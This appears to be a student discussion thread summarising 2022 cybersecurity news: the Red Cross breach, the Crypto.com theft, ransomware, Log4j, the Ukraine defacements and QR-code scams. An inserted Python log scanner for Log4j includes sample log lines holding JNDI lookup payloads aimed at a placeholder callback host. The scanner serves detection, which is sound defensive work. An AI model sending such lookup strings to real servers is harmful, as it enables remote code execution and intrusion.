Oluwaseun Soyomokun says
Red Cross suffers cyber-attack – data of 515,000 ‘highly vulnerable’ people exposed.
The International Committee of the Red Cross (ICRC) has revealed a data breach exposing information belonging to over half a million “highly vulnerable” people.
The ‘sophisticated’ attack was detected last week. In total, over 515,000 individuals are believed to have been impacted with many classed as “highly vulnerable” – including those separated from their families due to conflict and disasters, others classified as missing people, and individuals being held in detention centers.
https://portswigger.net/daily-swig/red-cross-suffers-cyber-attack-data-of-515-000-highly-vulnerable-people-exposed
Matthew Bryan says
Article: Cybersecurity training isn’t working. And hacking attacks are only getting worse
Author: Danny Palmer
Published: 06 Jan 2022
Link: https://www.zdnet.com/article/your-cybersecurity-training-needs-improvement-because-hacking-attacks-are-only-getting-worse/
Cyber attacks continue to increase and there is a pressing need to educate businesses and consumers about how to protect themselves. Most people do not understand the implications of a severe cyber attack and often associate cyber threats with identity theft and fraud instead of larger attacks on infrastructure.
Cybersecurity training is often infrequent and fails to explain the severity of the present threat landscape. Consumers are typically only exposed to security training through their employers during annual sessions. Beyond this exposure, most people don’t pay much attention to cybersecurity during the year. In order to address this, companies need to create a culture of security awareness and find opportunities throughout the year that relate to the day to day activities of their employees. These efforts should focus on helping people to understand the severity of the current threat landscape and how attacks can affect much more than people’s identity and financial well being. This increased awareness will be critical as new technologies, such as IoT, gain traction and increase risk.
Shubham Patil says
2FA Bypassed in $34.6M Crypto.com Heist: What We Can Learn
Crypto.com acknowledged that it had lost $34.65 million worth of cash, Bitcoin and Ethereum after getting ransacked in an attack that slipped fat transactions past two-factor authentication (2FA).
Crypto.com has acknowledged that yes, the total amount of the loss is well over $300 million – far more than was initially estimated – but that all customers had been reimbursed. The company also said that the robbers pulled it off by blowing past the exchange’s 2FA system.
Crypto.com immediately suspended withdrawals on the platform as it investigated. The exchange fully restored the affected accounts, revoked all 2FA tokens and added additional security hardening measures, requiring all customers to re-login and set up their 2FA token.
Finally, Crypto.com is introducing the Worldwide Account Protection Program (WAPP) to offer additional protection and security for user funds held in the Crypto.com app and the Crypto.com Exchange. Designed to protect user funds against unauthorized withdrawals, WAPP restores funds up to USD $250,000 for qualified users.
Link: https://threatpost.com/2fa-bypassed-crypto-com-heist/177846/
Mohammed Syed says
FIN8 Hackers Spotted Using New ‘White Rabbit’ Ransomware in Recent Attacks (thehackernews.com)
According to the article, a new ransomware family called White Rabbit appeared in the world recently, and FIN8 is a financially motivated actor who has been spotted targeting financial organizations for several years.
The deadline for the victim to pay a ransom is set to four days, after which the actors threaten to send the stolen data to data protection authorities, leading to data breach GDPR penalties.
Amelia Safirstein says
The Ukrainian government faced a cyber attack in which many of their government websites displayed a large warning statement including the words “All information about you has become public, be afraid and wait for the worst”. The message continued on in a way that insinuated that it had been written by Ukraine’s neighboring country, Poland. Ukraine officials believe that the attack may have actually come from Russia in an attempt to spark controversy between Ukraine and Poland. It appears that no personal data was actually breached. This ties into one of the points made in the reading this week: Not all risks/incidences fall into line with the classic risk management equations. The websites have been restored and data is safe but tensions in Ukraine have been heightened.
https://www.cnn.com/2022/01/14/europe/ukraine-cyber-attack-government-intl/index.html
Yangyuan Lin says
Don’t Use Public Wi-Fi Without DNS Filtering
With public Wi-Fi becoming more and more standard in today’s society, providing public Wi-Fi is a premium service for your customers. According to recent statistics, there are about 410,000 public Wi-Fi hotspots in the United States alone, located in public places such as parks, libraries, public transportation, train stations, etc. Public Wi-Fi has become an integral part of modern life.
While public Wi-Fi has many benefits to offer, when users use public Wi-Fi, it means that users may be vulnerable to many cyber threats, such as malware, viruses, hacking, and other forms of intrusion. It also provides opportunities for cybercriminals to commit virtual crimes and harm internet users. However, having a solid DNS filtering service can stop cyber threats like malware, ransomware, phishing, and botnets before they reach network devices. Also, DNS can filter out unwanted content such as pornographic material, violence, and drug-related content.
Link: https://thehackernews.com/2022/01/dont-use-public-wi-fi-without-dns.html
Elizabeth Gutierrez says
Myanmar’s military junta seeks ban on VPNs and digital currency
A bill signed by Soe Thein, Myanmar’s permanent secretary of the military’s transport and communications ministry, intends to criminalize the use of virtual private networks and transacting via crypto. It also demands that Internet service providers share citizen internet records upon request by authorities. Citizens who fail to abide by these new laws could face different penalties, ranging from prison terms of up to one year for crypto trading and up to 3 years for VPN use and fines of up to $2,800. This bill comes after a social media ban that took place in February of 2021 in an effort to digitally censor residents from the outside world.
Link: https://www.theregister.com/2022/01/24/myanmar_military_junta_bans_vpns_crypto/
Ryan Trapp says
Twitter’s top security staff out after incoming CEO shakes things up
In a surprise shakeup, Twitter’s CISO and head of security have been ousted from the company. It does not appear that this move was voluntary for both of these individuals. Many are speculating that this may be current CEO Parag Agrawal’s way of establishing his own stamp on the company after former CEO Jack Dorsey stepped down a few months ago. This move so far has been criticized in the Infosec community as both of these individuals are highly respected and regarded as some of the top security people in the field. It is not certain who will take over in these roles at this time.
https://www.theregister.com/2022/01/25/in_brief_security/
Jason Burwell says
“Hackers Infect macOS with New DazzleSpy Backdoor in Watering-Hole Attacks”
A previously undocumented cyber-espionage malware aimed at Apple’s macOS operating system leveraged a Safari web browser exploit as part of a watering hole attack targeting politically active, pro-democracy individuals in Hong Kong.
Slovak cybersecurity firm ESET attributed the intrusion to an actor with “strong technical capabilities,” calling out the campaign’s overlaps to that of a similar digital offensive disclosed by Google Threat Analysis Group (TAG) in November 2021.
https://thehackernews.com/2022/01/hackers-infect-macos-with-new-dazzlespy.html?&web_view=true
Joshua Moses says
The Department of Homeland Security is expecting Russia to launch a cyber attack against the United States due to Washington’s support of the Ukraine. In recent weeks, tensions have been running high due to a standoff between Russia and Ukraine at the Ukrainian border. A lot of people are wondering if Russia is preparing to invade them. DHS warns that Russia has a range of offensive cyber tools which they could employ against U.S. networks, and this in turn could potentially affect operations of planes, hospitals, dams, and even bridges.
Russia-based cybercriminals are said to be responsible for two recent significant security breaches: a ransomware attack that caused the operators of the massive Colonial Pipeline to shut down in May 2021, and another ransomware attack of the meat processing company JBS. Some new potential targets could be wastewater treatment, agriculture, and/or transportation, just to name a few. “Officials warn that efforts to stop such cyberattacks on U.S. targets are virtually impossible, given their sophistication.” (Josh Meyer)
If Russia were to launch a cyberattack against these U.S. targets, it is likely that Washington will retaliate. “And that could trigger a potentially dangerous escalation that could threaten to draw the United States directly into the conflict between Russia and its neighbor Ukraine.” (Josh Meyer)
https://news.yahoo.com/homeland-security-warns-russia-could-230721297.html?fr=sycsrp_catchall
Hang Nu Song Nguyen says
https://www.sciencedirect.com/science/article/pii/S0963868722000038
“Strategic roles of IT modernization and cloud migration in reducing cybersecurity risks of organizations: The case of U.S federal government”
This article is interested in security and cloud. This article changed my thought that using cloud service would increase cyber threat. Based on datasets from US federal agencies, the article points out that migration of the legacy systems to the cloud will decrease the number of security incidents. Moreover, “a 1%-point increase in the proportion of IT budgets spent on IT modernization is associated with a 5.6% decrease in the number of security incidents.”
Amelia Safirstein says
Hi Hang,
Great points! It can be stressful trusting your systems to a cloud provider and precautions like legal agreements should always be put in place but in some cases, cloud providers can be the most secure option. I believe this is especially true for smaller businesses that may be more susceptible to falling behind on updates to software and equipment.
Miray Bolukbasi says
The BBC article, “The battle over end-to-end encryption,” is news to understand the recent push by the UK and other agencies against Facebook Messenger. While I was reading this article, it also came to my attention that WhatsApp, iMessage, or Signal protects user data with end-to-end encryption. However, the fact Facebook has not introduced this control for its messenger application becomes a threat for young users to be victims of online predators.
In today’s digital world, I believe it’s important that our chatting apps protect our data with encryption methods where it scrambles data and makes it unreadable. Certain websites also use encrypted connections between you and the website. The padlock sign on the browser represents the encryption and is something you might need to check while browsing on the web. Especially for confidential communication or banking websites, it’s even more crucial to make sure criminals cannot read your data while it travels over the internet.
Also, a good highlight comes from US National Center for Missing and Exploited Children, where they announced 21.7 million reports were made in the US in 2020 about child sexual abuse material being exchanged on social media.
https://www.bbc.com/news/technology-60055270
Michael Galdo says
Merck Awarded $1.4B Insurance Payout over NotPetya Attack
Pharmaceutical company, Merck, was awarded a $1.4 billion payout last month on its property insurance policy, for losses the company suffered because of the 2017 NotPetya cyberattacks. Merck’s cyber-insurance company, International Indemnity, was claiming the losses fell under the “War of Hostile Acts” exclusion, which is a common clause in insurance policies which excludes damage arising from a warlike act between sovereign or quasi-sovereign entities. The Superior Court of New Jersey ruled that the exclusion was “inapplicable”, and so Merck’s $1.75 billion property insurance policy will have to cover the damage the NotPetya attacks did to the company’s 40,000 computers.
https://threatpost.com/merck-insurance-payout-notpetya-attack/177872/
Bryan Garrahan says
https://www.infosecurity-magazine.com/blogs/fisma-requirements-are-you/
This article touches on which organizations must comply with the Federal Information Security Management Act (FISMA). The article writes, “Any US organization directly related to or doing business with the US government, including federal- and state-level government agencies and contractors, state government departments, military subcontractors and even data clearinghouses fall under FISMA regulations”. The article notes that the National Institute of Standards and Technology (NIST) has outlined key steps to be FISMA compliant, which include:
1.) Track and categorize all information and media devices that must be protected;
2.) Set baseline security controls. Implement and document their use in the appropriate security system;
3.) Regularly refine these controls using a defined risk-assessment procedure as part of an annual review process; and
4.) Authorize the IT system for processing within the selected group of authorized personnel and monitor the systems regularly.
The article also states that organizations must adhere to data destruction requirements in order to achieve full compliance. FISMA requires that organizations:
1.) Set and enforce policies for protecting all data and information systems, whether on paper or in digital format;
2.) Appoint authorized personnel for sole access of the IT systems and federal information; and
3.) Ensure complete and total destruction of both the data and the media in which it is stored upon reaching end-of-life.
Alexander William Knoll says
“School District reports a 334% hike in cybersecurity insurance costs”
A school district in Chicago released details on its cyber-insurance, from $6,661 in 2021 to $22,229 in 2022. This massive spike is due to an increasing number of threats, their severity, & potential for costly disruptions. A key factor leading to these cost increases is due to ransomware and also encrypting attacks. The theft of data can significantly compromise school networks, employees, & students. Ransomware attackers target these small school districts because they are rarely well-protected enough to deal with them, and because they typically have active insurance policies, they are attractive targets. For this school district in particular, the insurer is requiring a district-wide implementation of MFA. The attackers typically use compromised user credentials to target systems, so MFA, for the most part, is enough to stop attacks before they can even start. This also prevents attackers from being able to tweak with backups. District 87, the district discussed in the article, is one of many that will have to deal with this burden on its annual budget, and that also stretches to apply to organizations such as hospitals, non-profits, & local governments. Attackers see these targets as “soft”, and in order to reduce these new insurance premiums, it begins with increased user awareness.
https://www.bleepingcomputer.com/news/security/school-district-reports-a-334-percent-hike-in-cybersecurity-insurance-costs/
Ornella Rhyne says
The International Committee of the Red Cross (ICRC) has revealed a major data breach that compromised the personal details of over 515,000 “highly vulnerable” victims.
It was stolen from a Swiss contractor that stores the data on behalf of the global humanitarian organization headquartered in Geneva.
The ICRC claimed it originated from at least 60 Red Cross and Red Crescent National Societies worldwide.
https://www.infosecurity-magazine.com/news/red-cross-supply-chain-data-breach/
Michael Duffy says
If you are currently working at an organization, you probably heard about the recent Log4J exploit over the holidays. Which, nonetheless, was not a fun time for anyone that has to identify and patch affected software packages. Essentially how it works is anyone with an LDAP server can force the logging tool to log an object and effectively execute anything they want on the target. Here is a video that explains how easy it is to do: https://www.youtube.com/watch?v=0-abhd-CLwQ&t=1s
As you can see it’s 17 lines of code. But what’s even more scary is how common log4j is across platforms and packages. And if you do have a computer that can be exploited you can literally attack it in any shape or form. From exfiltration of data, to bottling the computer or turning it into a botnet. And that is what amazes me – how easy this is to exploit and how much damage it will cost businesses over the long run.
Something in our readings that is discussed is that being an attacker is easier. We have to know every precaution and security measure necessary – and even still there could be a threat looming unnoticed.
https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896
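The Log4j behaviour described in the post above leaves a recognizable lookup string in whatever was logged, which defenders can hunt for. As an added example (not part of the original post or the linked article), this Python script scans constructed web access-log lines for JNDI lookup expressions in plain or percent-encoded form and reports the requesting clients and the callback hosts; the sample lines, the `.invalid` host name and all function names are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

# A JNDI lookup expression as it would appear in a string handed to the logger.
# Captures the protocol (ldap, rmi, dns, ...) and the host the lookup points at.
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}\s]+)", re.IGNORECASE
)

# Constructed sample log lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '198.51.100.7 - - [12/Dec/2021:10:01:22 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [12/Dec/2021:10:01:25 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.example.invalid/a}"',
    '203.0.113.9 - - [12/Dec/2021:10:01:31 +0000] "GET /search?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.44 - - [12/Dec/2021:10:02:02 +0000] "GET /docs/jndi-overview HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def decode_repeatedly(text, max_rounds=3):
    """URL-decode until the text stops changing, so that percent-encoded
    (including double-encoded) lookups become visible to the regex."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan(lines):
    """Return one finding per line that contains a JNDI lookup expression."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = JNDI_RE.search(decode_repeatedly(line))
        if match:
            findings.append(
                {
                    "line": number,
                    "client": line.split(" ", 1)[0],  # first field of the log line
                    "scheme": match.group("scheme").lower(),
                    "callback_host": match.group("host").lower(),
                }
            )
    return findings


def summarize(findings):
    """Unique requesting clients and callback hosts, sorted, for follow-up:
    egress-log searches, blocking, and checking which hosts ran Log4j."""
    clients = sorted({f["client"] for f in findings})
    hosts = sorted({f["callback_host"] for f in findings})
    return clients, hosts


if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for finding in results:
        print(finding)
    print(summarize(results))
```

A match shows that a lookup string reached the logs, not that the host was vulnerable; upgrading the affected Log4j packages remains the fix, and outbound connections to the listed callback hosts are the thing to check next.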
Wilmer Monsalve says
https://cyware.com/news/threat-actors-use-malicious-qr-codes-warns-fbi-e553b353
In this article it explains how threat actors have found a new tactic to redirect users to malicious websites through the use of QR codes. This method has become very useful as nowadays it is more common to use a QR code when walking into a restaurant for the menu, or scanning the QR code to fill up the parking meter. However, users have been misled and been giving away their financial information without even knowing it. I found this method being very effective as it is hidden in plain sight but once the interface can be noticed as an unsafe/unsecure then it can be avoided. Very clever and deceptive, especially when using it to fill up a parking meter, I guess that’s why they made an application for city parking now.